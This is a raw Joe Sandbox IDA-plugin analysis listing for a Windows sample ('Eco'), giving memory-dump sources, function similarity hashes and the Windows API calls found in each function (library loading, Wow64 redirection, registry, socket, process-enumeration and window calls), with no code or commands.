                           • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmp
                           • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmp
                           • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmp
                           • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmp
                           • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString_memset
                          • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule$=[
                          • API String ID: 3158253471-134945641
                          • Opcode ID: 0111c5503c427c486828b5c9895df53e88b5dc280c537313e7c415fefbd2b7d0
                          • Instruction ID: b9de1d0bd9f443b93d8d96f7ad0af1cbbbb2065085a2e133f1351588cc7bd8a5
                          • Opcode Fuzzy Hash: 0111c5503c427c486828b5c9895df53e88b5dc280c537313e7c415fefbd2b7d0
                          • Instruction Fuzzy Hash: 56E06D742007128FEB209F79E4087827FE0BF19348F00891EE486C2291E7B5E548CB51
                          APIs
                          • LoadLibraryA.KERNEL32(kernel32.dll,?,005501AA,?), ref: 0058C4AF
                          • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 0058C4C1
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: AddressLibraryLoadProc
                          • String ID: GetSystemWow64DirectoryW$kernel32.dll
                          • API String ID: 2574300362-1816364905
                          • Opcode ID: b00b03a230218dfaedb5758b6365a47f501cb19a97e71d08f0f2fdb4c947ffe5
                          • Instruction ID: 11dc93bfcdc8790bb3ebd7a89bdf0bdda988bd03ac1a689fa349eebefb39a00f
                          • Opcode Fuzzy Hash: b00b03a230218dfaedb5758b6365a47f501cb19a97e71d08f0f2fdb4c947ffe5
                          • Instruction Fuzzy Hash: 4DE0C2345107128FEF206B25CC18BA27ED4BF2578AB00D429EC8AE22B0D7B0C880C720
                          APIs
                          • LoadLibraryA.KERNEL32(kernel32.dll,?,00524B44,?,005249D4,?,?,005227AF,?,00000001), ref: 00524B85
                          • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00524B97
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: AddressLibraryLoadProc
                          • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                          • API String ID: 2574300362-3689287502
                          • Opcode ID: aa1f26c60d458858997a026e63e92f50c000d181c945dd28843570329d2729b8
                          • Instruction ID: 7627f740d31f5f10a6b973feee63ef2bb56b5b0e2aed04896214a1af9af9b71a
                          • Opcode Fuzzy Hash: aa1f26c60d458858997a026e63e92f50c000d181c945dd28843570329d2729b8
                          • Instruction Fuzzy Hash: AFD012745207338FDB205F71EC58B467AD4BF16791F11D82DD485D21D0D670D480CE10
                          APIs
                          • LoadLibraryA.KERNEL32(kernel32.dll,?,00524AF7,?), ref: 00524BB8
                          • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00524BCA
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: AddressLibraryLoadProc
                          • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                          • API String ID: 2574300362-1355242751
                          • Opcode ID: 5d88e20b00d714683c3f83f24d1b7ff3a7edd3756d2671d97369b6a676cc0ec3
                          • Instruction ID: ed38c9927dcb996749a807438ce4cf7787454dc41cbad23d465198699be7d92f
                          • Opcode Fuzzy Hash: 5d88e20b00d714683c3f83f24d1b7ff3a7edd3756d2671d97369b6a676cc0ec3
                          • Instruction Fuzzy Hash: DFD01770520722CFDB209F71EC08B4B7AE5BF16391B11AC6ED486D25E5EAB4D990DA10
                          APIs
                          • LoadLibraryA.KERNEL32(advapi32.dll,?,0059145E), ref: 0059121D
                          • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 0059122F
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: AddressLibraryLoadProc
                          • String ID: RegDeleteKeyExW$advapi32.dll
                          • API String ID: 2574300362-4033151799
                          • Opcode ID: 6b3bc4f0b21f961717d2692f92986d12bcacbb67a0a313153336f3b8c27380b4
                          • Instruction ID: fbe6495a7bc6ec6cc49284599ec9bf1065635f085db9acac2b0447d6ae54f475
                          • Opcode Fuzzy Hash: 6b3bc4f0b21f961717d2692f92986d12bcacbb67a0a313153336f3b8c27380b4
                          • Instruction Fuzzy Hash: B5D012745607238FDF205F75DC486467EE4FF25796B11C92DD485D6190D670C480C611
                          APIs
                          • LoadLibraryA.KERNEL32(kernel32.dll,?,00525E3D), ref: 005255FE
                          • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00525610
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: AddressLibraryLoadProc
                          • String ID: GetNativeSystemInfo$kernel32.dll
                          • API String ID: 2574300362-192647395
                          • Opcode ID: d8eaf2f31a0c99eecdc2b3f9be45562d0cd2b352fe5cb92abc08f0c4aa4971d6
                          • Instruction ID: 25fea86732aebbb037d37f2c2669c7f75afe3b26a30e0252b8bf8663f525737b
                          • Opcode Fuzzy Hash: d8eaf2f31a0c99eecdc2b3f9be45562d0cd2b352fe5cb92abc08f0c4aa4971d6
                          • Instruction Fuzzy Hash: 3ED01774930B228FEB209F31EC0865B7AE4BF16395B11E82AD486D22E1E670D880CA50
                          APIs
                          • LoadLibraryA.KERNEL32(kernel32.dll,00000001,005891A6,?,005A0980), ref: 005895A0
                          • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 005895B2
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: AddressLibraryLoadProc
                          • String ID: GetModuleHandleExW$kernel32.dll
                          • API String ID: 2574300362-199464113
                          • Opcode ID: 8f89064a6b324aed1f15656e06ec1f8a940cf910502c9f8b66ec6f69232f253b
                          • Instruction ID: e6bec4fe4a0ab2f8e6199d067429312fdc66014f42bd8f1eecc863f4be14a157
                          • Opcode Fuzzy Hash: 8f89064a6b324aed1f15656e06ec1f8a940cf910502c9f8b66ec6f69232f253b
                          • Instruction Fuzzy Hash: 50D012705207128FEB215F71DC1CA567AD4BF16391B159C2DD885D2190D7B0C480C710
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 94645d4c6464de39e706f3fd23badad96fbeec8067767b5f64ab4207763467d4
                          • Instruction ID: afd084b53d0e2f865f878e215c9644af87f32cebd860babe3a24e5ef7fa2d248
                          • Opcode Fuzzy Hash: 94645d4c6464de39e706f3fd23badad96fbeec8067767b5f64ab4207763467d4
                          • Instruction Fuzzy Hash: 06C19275A0421AEFDB14CFA4C884DAEBBB9FF4C718B104998E815DB251D731ED81DB90
                          APIs
                          • CharLowerBuffW.USER32(?,?), ref: 0058E56F
                          • CharLowerBuffW.USER32(?,?), ref: 0058E5B2
                            • Part of subcall function 0058DC56: CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 0058DC76
                          • VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 0058E7B2
                          • _memmove.LIBCMT ref: 0058E7C5
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: BuffCharLower$AllocVirtual_memmove
                          • String ID:
                          • API String ID: 3659485706-0
                          • Opcode ID: 2577f55490b6367f3b8b54e315cdb4c8c2657133c58aa43f2f0fb5122d38f02e
                          • Instruction ID: 9356ee359c299626ce91f79c111de5cb551e599c96edd96d5ba29373bbcfa4bb
                          • Opcode Fuzzy Hash: 2577f55490b6367f3b8b54e315cdb4c8c2657133c58aa43f2f0fb5122d38f02e
                          • Instruction Fuzzy Hash: 12C147716083119FC704EF24C49596ABBF4FF89314F14896DF899AB391D730E946CB81
                          APIs
                          • CoInitialize.OLE32(00000000), ref: 00588575
                          • CoUninitialize.OLE32 ref: 00588580
                            • Part of subcall function 0059DC66: CoCreateInstance.OLE32(00000018,00000000,00000005,00000028,?,?,?,?,?,00000000,00000000,00000000,?,005887D6,?,00000000), ref: 0059DCCE
                          • VariantInit.OLEAUT32(?), ref: 0058858B
                          • VariantClear.OLEAUT32(?), ref: 0058885C
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
                          • String ID:
                          • API String ID: 780911581-0
                          • Opcode ID: c9e12f76c44f8d0d0454c709d2cf63f96f04c9269a234f4653107edebc37f675
                          • Instruction ID: 27e29a4124fa8dad29c92d67db87adc1e48df04808b93a0c508f118795bc8da8
                          • Opcode Fuzzy Hash: c9e12f76c44f8d0d0454c709d2cf63f96f04c9269a234f4653107edebc37f675
                          • Instruction Fuzzy Hash: 71A13775604B029FDB10EF14C485A6ABBE4FF88354F548948F999AB3A1DB30ED44CF92
                          APIs
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: Variant$AllocClearCopyInitString
                          • String ID:
                          • API String ID: 2808897238-0
                          • Opcode ID: c136629f744ff6d54edbdd2b86fa4f73ec485741da5e497af6bfd26b8f6ae8e5
                          • Instruction ID: 6bdaa42c394cbd6ff79a2904148a61b793db75fbde09b5392e94afa923c91154
                          • Opcode Fuzzy Hash: c136629f744ff6d54edbdd2b86fa4f73ec485741da5e497af6bfd26b8f6ae8e5
                          • Instruction Fuzzy Hash: 4351E53460870B9ADF20AF65D899A2DBFA9FF9C315F209C1FE546CB291DF7098809711
                          APIs
                          • CreateToolhelp32Snapshot.KERNEL32 ref: 0058F2EE
                          • Process32FirstW.KERNEL32(00000000,?), ref: 0058F2FC
                            • Part of subcall function 00521A36: _memmove.LIBCMT ref: 00521A77
                          • Process32NextW.KERNEL32(00000000,?), ref: 0058F3BC
                          • CloseHandle.KERNEL32(00000000,?,?,?), ref: 0058F3CB
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32_memmove
                          • String ID:
                          • API String ID: 2576544623-0
                          • Opcode ID: e213274815ebbb648f9051482367b1bfe8b347eedee0b87204b802784eb7b038
                          • Instruction ID: 842299a0ccf607ab249597633163086982877dd35a6556571acfceff0af40f42
                          • Opcode Fuzzy Hash: e213274815ebbb648f9051482367b1bfe8b347eedee0b87204b802784eb7b038
                          • Instruction Fuzzy Hash: 81516EB15047129FD710EF24DC89EABBBE8FFD9700F00492DF595922A1EB709948CB92
                          APIs
                          • GetWindowRect.USER32(?,?), ref: 00599C50
                          • ScreenToClient.USER32(00000002,00000002), ref: 00599C83
                          • MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,00000002,?,?), ref: 00599CF0
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: Window$ClientMoveRectScreen
                          • String ID:
                          • API String ID: 3880355969-0
                          • Opcode ID: c1828171885a65954b7f732fe3614d3e9de84dd7473e29c96d63ba5ed0302429
                          • Instruction ID: bd74c6fa2c9e075cab38f057a91b73e4458d2b41861d9155398aa91c7892cba2
                          • Opcode Fuzzy Hash: c1828171885a65954b7f732fe3614d3e9de84dd7473e29c96d63ba5ed0302429
                          • Instruction Fuzzy Hash: 5C514D74A00209AFDF24DF68C984AAE7FF6FB55320F10815EF8159B2A0D730AD91DB90
                          APIs
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                          • String ID:
                          • API String ID: 2782032738-0
                          • Opcode ID: a7c34a093fdd5ab58b6ffc98053f9d5ae49c5acda348f4cccab4e545be81f79d
                          • Instruction ID: d2d499df8a999ea6430a218bfe89c1b6fa874a0d0f8ba36e84977b021d9e826e
                          • Opcode Fuzzy Hash: a7c34a093fdd5ab58b6ffc98053f9d5ae49c5acda348f4cccab4e545be81f79d
                          • Instruction Fuzzy Hash: C741B572A047469BDB188EA9C891A6FBFA5BF85360F24853DE855C7640DA70FD418F40
                          APIs
                          • SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 0056A46D
                          • __itow.LIBCMT ref: 0056A49E
                            • Part of subcall function 0056A6EE: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 0056A759
                          • SendMessageW.USER32(?,0000110A,00000001,?), ref: 0056A507
                          • __itow.LIBCMT ref: 0056A55E
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: MessageSend$__itow
                          • String ID:
                          • API String ID: 3379773720-0
                          • Opcode ID: 97ec6fb01b94eb94b3c007373c8625ad7261d4165c26fd8c666b2a8d13e9986d
                          • Instruction ID: 7cbc44d19fe3f6ea65bb0ed3d22e3e66ceb2b2dab03cbc65480013728346f107
                          • Opcode Fuzzy Hash: 97ec6fb01b94eb94b3c007373c8625ad7261d4165c26fd8c666b2a8d13e9986d
                          • Instruction Fuzzy Hash: CA418E70A00219ABDF11EF64D849BBE7FB9FF95750F040029F906A3281DB709E44CBA2
                          APIs
                          • socket.WSOCK32(00000002,00000002,00000011), ref: 00586E81
                          • WSAGetLastError.WSOCK32(00000000), ref: 00586E91
                            • Part of subcall function 00514D37: __itow.LIBCMT ref: 00514D62
                            • Part of subcall function 00514D37: __swprintf.LIBCMT ref: 00514DAC
                          • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00586EF5
                          • WSAGetLastError.WSOCK32(00000000), ref: 00586F01
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: ErrorLast$__itow__swprintfsocket
                          • String ID:
                          • API String ID: 2214342067-0
                          • Opcode ID: bcfd8120bd34fa25626096cf0ab2811a357eb5aedfc7bf7f2d1e346e12dd7ba9
                          • Instruction ID: a3dcfe7e5b4ab18535d3d074f2500b4c4820515aa7a5f820ed7883d686fe6259
                          • Opcode Fuzzy Hash: bcfd8120bd34fa25626096cf0ab2811a357eb5aedfc7bf7f2d1e346e12dd7ba9
                          • Instruction Fuzzy Hash: 6D41B475740201AFEB20BF24EC8AF6A7BE4FB84B14F048418FA15AB3C2D6749C418F91
                          APIs
                          • #16.WSOCK32(?,?,00000000,00000000,00000000,00000000,?,?,00000000,005A0980), ref: 00586957
                          • _strlen.LIBCMT ref: 00586989
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: _strlen
                          • String ID:
                          • API String ID: 4218353326-0
                          • Opcode ID: 34df360bfedea0c158d80adcc6931550f3e490cf951f620afa2178b57cc548ab
                          • Instruction ID: f8e2919d7ebb196296faef6ce2081090f45c381775930f286ca2c1308629c34f
                          • Opcode Fuzzy Hash: 34df360bfedea0c158d80adcc6931550f3e490cf951f620afa2178b57cc548ab
                          • Instruction Fuzzy Hash: 51419531600116EBDB14FBA4DC99EBEBFA9BF94310F148155F816A72D2DB30AD44CB91
                          APIs
                          • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00598CCB
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: InvalidateRect
                          • String ID:
                          • API String ID: 634782764-0
                          • Opcode ID: c84155baf4af6cd26b22b8f755f0046b9677a6b48d017ee087142bf122ef75b6
                          • Instruction ID: 1ed3261b05692280d38f225ca3447acc33a9b5657070887577dcfb25d19cab17
                          • Opcode Fuzzy Hash: c84155baf4af6cd26b22b8f755f0046b9677a6b48d017ee087142bf122ef75b6
                          • Instruction Fuzzy Hash: 1D319234601209AFEF249E18CC85BB93FA5FB57310F644512FA51EB2E1CF31AD54ABA1
                          APIs
                          • ClientToScreen.USER32(?,?), ref: 0059AF4D
                          • GetWindowRect.USER32(?,?), ref: 0059AFC3
                          • PtInRect.USER32(?,?,0059C437), ref: 0059AFD3
                          • MessageBeep.USER32(00000000), ref: 0059B044
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: Rect$BeepClientMessageScreenWindow
                          • String ID:
                          • API String ID: 1352109105-0
                          • Opcode ID: 5ced89755a71c396471c5a5769335906af09da9b66535c6bfef3d577599542bd
                          • Instruction ID: ac27ae79ded88a8144b6dc9eb3885b016e4b96fc9fa506c8da6c48346e30f162
                          • Opcode Fuzzy Hash: 5ced89755a71c396471c5a5769335906af09da9b66535c6bfef3d577599542bd
                          • Instruction Fuzzy Hash: B541AD30600205DFEF21CF58D988AAA7FF6FB59300F1481AAE524CB251D731E845EB91
                          APIs
                          • GetKeyboardState.USER32(?,00000000,?,00000001), ref: 00571192
                          • SetKeyboardState.USER32(00000080,?,00000001), ref: 005711AE
                          • PostMessageW.USER32(00000000,00000102,00000001,00000001), ref: 00571214
